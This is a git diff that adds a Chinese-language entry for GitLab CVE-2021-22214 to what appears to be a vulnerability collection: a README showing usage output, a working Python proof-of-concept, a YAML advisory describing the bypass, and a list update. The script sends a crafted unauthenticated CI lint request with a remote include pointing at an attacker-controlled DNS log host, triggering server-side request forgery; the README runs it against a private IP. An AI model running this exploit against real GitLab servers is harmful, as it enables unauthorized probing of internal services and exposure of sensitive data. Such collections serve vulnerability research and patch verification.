diff --git a/cve/gitlab/2021/CVE-2021-22214/README.md b/cve/gitlab/2021/CVE-2021-22214/README.md new file mode 100644 index 0000000000000000000000000000000000000000..f288e84b47d7032b4fc15e19922410960b2142a0 --- /dev/null +++ b/cve/gitlab/2021/CVE-2021-22214/README.md @@ -0,0 +1,53 @@ +# CVE-2021-22214 +Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214) + +#### Usage + +- help + +``` +$ python3 gitlab_ssrf.py + +=============================================================== + _____ _ _ _ _ _____ _____ _____ ______ + / ____(_) | | | | | / ____/ ____| __ \| ____| + | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__ + | | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __| + | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| | + \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_| + + CVE-2021-22214 Powered by r0cky Team ZionLab +=============================================================== + +Example: + python3 gitlab_ssrf.py + +``` + +- use + +target: 192.168.80.136 + +![1624336331315](img/1624336331315.png) + +``` +$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn + +=============================================================== + _____ _ _ _ _ _____ _____ _____ ______ + / ____(_) | | | | | / ____/ ____| __ \| ____| + | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__ + | | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __| + | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| | + \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_| + + CVE-2021-22214 Powered by r0cky Team ZionLab +=============================================================== + +[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录. +``` + +![1624336369016](img/1624336369016.png) + + + diff --git a/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py b/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py new file mode 100644 index 0000000000000000000000000000000000000000..b16b4e33c0adffb282cd15930598451df50c1ddd --- /dev/null +++ b/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +@Author: r0cky +@Time: 2021/6/22-11:09 +""" +import json +import sys +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def banner(): + print(""" +=============================================================== + _____ _ _ _ _ _____ _____ _____ ______ + / ____(_) | | | | | / ____/ ____| __ \| ____| + | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__ + | | |_ | | __| | / _` | '_ \ \___ \\___ \| _ /| __| + | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| | + \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_| + + CVE-2021-22214 Powered by r0cky Team ZionLab +=============================================================== +""") + +def poc(url, dnshost): + + api="/api/v4/ci/lint" + data = {"include_merged_yaml": True, "content": "include:\n remote: http://{}/api/v1/targets?test.yml".format(dnshost)} + + headers = {"Content-Type": "application/json"} + + r = requests.post(url=url+api, data=json.dumps(data), headers=headers, verify=False) + if r.status_code == 200: + if dnshost in r.json()["errors"][0]: + print ("[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.") + return + print ("[-] 不存在 GitLab SSRF 漏洞!") + +def main(): + banner() + if (len(sys.argv) == 3): + url = sys.argv[1] + dnshost = sys.argv[2] + poc(url, dnshost) + else: + print("Example: \n python3 " + sys.argv[0] + " \n") + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png b/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png new file mode 100644 index 0000000000000000000000000000000000000000..b445c47c1c267a2d8430e5cec0978e71dc2b5b7d Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png differ diff --git a/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png b/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png new file mode 100644 index 0000000000000000000000000000000000000000..6021e910cc1d3fbc67d2e54803d846f3dfe91576 Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png differ diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml new file mode 100644 index 0000000000000000000000000000000000000000..37a69cb5a0ff4a231a62e1afda510e65544366b1 --- /dev/null +++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-22214 +source: https://github.com/aaminin/CVE-2021-22214 +info: + name: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 + severity: high + description: | + Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址,同时由于后端会检查最后扩展名,加上?test.yaml 即可绕过。远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 + scope-of-influence: + 13.10.5 > GitLab >= 10.5 + 13.11.5 > GitLab >= 13.11 + 13.12.2 > GitLab >= 13.12 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 + - https://www.tenable.com/plugins/nessus/152483 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2021-22214 + cwe-id: CWE-918 + cnvd-id: None + kve-id: None + tags: cve2021, SSRF, 未授权漏洞 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2b69f179a6e97f17564d06e258e4fe60d..789ee462a1fc668ecb4670b9bc4d4eb7bfaaba5e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -29,6 +29,7 @@ cve: - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2021-22214 - CVE-2022-1162 confluence: - CVE-2019-3396